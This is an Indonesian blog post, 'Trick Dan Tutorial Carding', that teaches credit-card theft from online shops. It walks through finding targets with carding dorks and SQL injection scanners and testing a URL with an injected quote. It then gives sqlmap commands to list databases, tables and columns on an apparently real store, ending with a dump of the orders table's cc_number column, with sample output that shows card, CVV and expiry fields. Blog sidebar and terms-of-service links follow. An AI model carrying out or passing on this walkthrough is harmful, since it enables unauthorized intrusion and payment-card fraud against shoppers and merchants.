Trick Dan Tutorial Carding

Ok Langsung Aja Ke Tkp 1. sqlmap 2. dork carding ( bisa cari di google ) / download 3. sqli scanner : sqli scanner 1 sqli scanner 2 sqli scanner 3 Pertama ,ambil dork lalu scan menggunakan sqli scanner : Setelah itu kita test URL target dengan memberi kan tanda petik di depan "=" http://www.zite.com/merchandise/index.php?cat=268 menjadi : http://www.zite.com/merchandise/index.php?cat='268 Nah, web tersebut error saat kita inject , Kedua, kita eksekusi menggunakan sqlmap : berikut perintahnya : ./sqlmap.py -u link --dbs Disini kita mendapatkan 3 database : [*] balboast_gkgbu [*] balboast_gkgcart [*] information_schema Setelah itu kita dump database nya untuk mencari table , gunakan perintah : ./sqlmap.py -u link -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" ) nah, saya dapat tables nya : Database: balboast_gkgcart [88 tables] +-----------------------+ | amanu | | categories | | clients | | components | | config | | config_groups | | customers | | form_data | | form_fields | | forms | | geo | | groups | | item_amanu | | item_cat | | item_files | | item_files_customer | | item_options | | item_options_linked | | item_options_values | | item_related | | item_thread | | item_thread_old | | items | | items_addphoto | | items_item_files | | items_packages | | languages | | logs | | mailinglist | | mailinglist_cat | | mailinglist_members | | manu | | news | | news_cat | | news_news_cat | | orders | | photos | | photos_cat | | pic_gallery | | ship_prices | | ship_zones | | sites | | sites_components | | thread | | thread_gel | | thread_items | | ups | | ups_packaging | | ups_pickup | | ups_service | | ups_units | | users | | users_access | | users_groups | | users_spu | | users_spu_values | | zones | +-----------------------+ [09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/ balboastitch.com' Kita pilih di bagian "orders" . Kita ambil columns nya . Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns Maka akan muncul seperti ini : Table: orders [18 columns] +-----------------+-------------+ | Column | Type | +-----------------+-------------+ | cart_id | varchar(15) | | cc_ex_month | tinyint(4) | | cc_ex_year | int(11) | | cc_number | varchar(30) | | cc_type | varchar(20) | | customer_id | int(11) | | cvv2 | varchar(20) | | date | datetime | | id | int(11) | | ipaddress | varchar(25) | | payment_method | varchar(15) | | shipping | float(8,2) | | shipping_method | varchar(5) | | status | tinyint(4) | | subtotal | float(8,2) | | tax | float(8,2) | | text | text | | total | float(8,2) | +-----------------+-------------+ Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :) Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump maka nanti cc number akan muncul walau proses agak lama .

GARUDA DECEPTICON SECURITY CYBER

Pages

Trick Dan Tutorial Carding

Iklan

Iklan

Iklan

A Text Widget

Total Visitor

Jumlah Pengunjung

New Story of My Life

Privacy Policy for Dakwah Salafiyun

Terms Of Service

Terms of Service for Dakwah Salafiyun

Introduction

License to use website

Acceptable use

Restricted access

User content

No warranties

Limitations of liability

Exceptions

Reasonableness

Other parties

Unenforceable provisions

Indemnity

Breaches of these terms and conditions

Variation

Assignment

Severability

Entire agreement

Law and jurisdiction

About these website Terms of Service

www.blogku-123faris.blogspot.com's details

New Tutorial

Dunia Maya Chatbox

Contact Form

Follow Us With Facebook

Disclaimer for Dakwah Salafiyun

Disclaimers for www.blogku-123faris.blogspot.com:

Consent

Update

Langgan

Follower

Pencarian

Entri Populer

Iklan

Popular Posts

Popular Posts

Blog Archive

About Me